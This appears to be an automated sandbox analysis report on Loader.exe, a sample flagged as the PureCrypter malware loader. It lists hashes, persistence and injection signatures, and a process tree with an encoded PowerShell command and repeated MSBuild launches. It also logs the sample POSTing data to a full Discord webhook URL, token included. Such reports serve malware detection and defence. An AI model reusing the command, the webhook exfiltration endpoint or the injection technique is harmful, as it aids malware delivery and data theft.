Analysis

  • max time kernel
    47s
  • max time network
    50s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    03/02/2023, 18:58 UTC

General

  • Target

    Loader.exe

  • Size

    1.6MB

  • MD5

    a44e526804469076d712e8a05ddd7759

  • SHA1

    7010fda540e70139020a7a79730e74e99bd8e6c9

  • SHA256

    46d7128963bde013c8ec359b285e47eabbf9c88e332735e02ced518773e8e95f

  • SHA512

    04c40ef00c80d641c4f7bced8aefc180d695ea23ef79e272167f1a567484be2ab7031ca55a246cbeba1ed0c0ed93223fc2a33daed7f2048c62f169f0e6325b36

  • SSDEEP

    49152:fBvdZG5o8InNXL9Qn0HpZjI64n2hcyfT2:pFZG5oNnRfh9

Malware Config

Signatures

  • Detect PureCrypter injector 1 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • PureCrypter

    PureCrypter is a .NET malware loader first seen in early 2021.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:364
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAyAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1104
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      2⤵
      PID:1776
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      2⤵
      PID:588
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      2⤵
      PID:1652
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      2⤵
      PID:1064
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      2⤵
      PID:580
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      2⤵
      PID:1724
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      2⤵
      PID:1772
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      2⤵
      PID:932
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      2⤵
      PID:1492
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      2⤵
      PID:888

Network

  • flag-us
    DNS
    ptb.discord.com
    Loader.exe
    Remote address:
    8.8.8.8:53
    Request
    ptb.discord.com IN A
    Response
    ptb.discord.com IN A 162.159.128.233
    ptb.discord.com IN A 162.159.135.232
    ptb.discord.com IN A 162.159.138.232
    ptb.discord.com IN A 162.159.137.232
    ptb.discord.com IN A 162.159.136.232
  • flag-us
    POST
    https://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy
    Loader.exe
    Remote address:
    162.159.128.233:443
    Request
    POST /api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: ptb.discord.com
    Content-Length: 202
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 204 No Content
    Date: Fri, 03 Feb 2023 19:01:14 GMT
    Content-Type: text/html; charset=utf-8
    Connection: keep-alive
    set-cookie: __dcfduid=216b8ec0a3f511ed8e2022b34b66156a; Expires=Wed, 02-Feb-2028 19:01:14 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1675450875
    x-ratelimit-reset-after: 1
    Via: 1.1 google
    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5HDV0Gj5YpoR6%2FJGLQYLMgX65zbEIC1Phax524jgnDqiNo5ZMV%2FjRnmzYvJVq9SvimkXr%2BaGYhrms1q5pgKO8rE7NRHIKGxgjdxpQv%2BmEwsbkZihIJlXnezrw2%2FLTjxMLg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Set-Cookie: __sdcfduid=216b8ec0a3f511ed8e2022b34b66156a533a721b4e4ddd865171029e1827a5077967b578e710f0c99783e184c5e8c53b; Expires=Wed, 02-Feb-2028 19:01:14 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
    Set-Cookie: __cfruid=06bf2a3f5434bc90b1b64641c8329bcbf8c6f723-1675450874; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 793d69f9fb350ead-AMS
  • 162.159.128.233:443
    https://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy
    tls, http
    Loader.exe
    1.2kB
    4.4kB
    9
    9

    HTTP Request
    POST https://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy

    HTTP Response
    204
  • 8.8.8.8:53
    ptb.discord.com
    dns
    Loader.exe
    61 B
    141 B
    1
    1

    DNS Request
    ptb.discord.com

    DNS Response
    162.159.128.233
    162.159.135.232
    162.159.138.232
    162.159.137.232
    162.159.136.232

MITRE ATT&CK Enterprise v6

Downloads

  • memory/364-54-0x00000000008B0000-0x0000000000A52000-memory.dmp
    Filesize: 1.6MB
  • memory/364-55-0x000000001BF40000-0x000000001C218000-memory.dmp
    Filesize: 2.8MB
  • memory/364-67-0x000000001BEC7000-0x000000001BEE6000-memory.dmp
    Filesize: 124KB
  • memory/364-66-0x000000001C220000-0x000000001C2DC000-memory.dmp
    Filesize: 752KB
  • memory/364-58-0x000000001BEC7000-0x000000001BEE6000-memory.dmp
    Filesize: 124KB
  • memory/1104-60-0x000007FEEB530000-0x000007FEEC08D000-memory.dmp
    Filesize: 11.4MB
  • memory/1104-59-0x000007FEEC090000-0x000007FEECAB3000-memory.dmp
    Filesize: 10.1MB
  • memory/1104-61-0x00000000029D4000-0x00000000029D7000-memory.dmp
    Filesize: 12KB
  • memory/1104-62-0x000000001B950000-0x000000001BC4F000-memory.dmp
    Filesize: 3.0MB
  • memory/1104-63-0x00000000029DB000-0x00000000029FA000-memory.dmp
    Filesize: 124KB
  • memory/1104-64-0x00000000029D4000-0x00000000029D7000-memory.dmp
    Filesize: 12KB
  • memory/1104-65-0x00000000029DB000-0x00000000029FA000-memory.dmp
    Filesize: 124KB
  • memory/1104-57-0x000007FEFB6B1000-0x000007FEFB6B3000-memory.dmp
    Filesize: 8KB
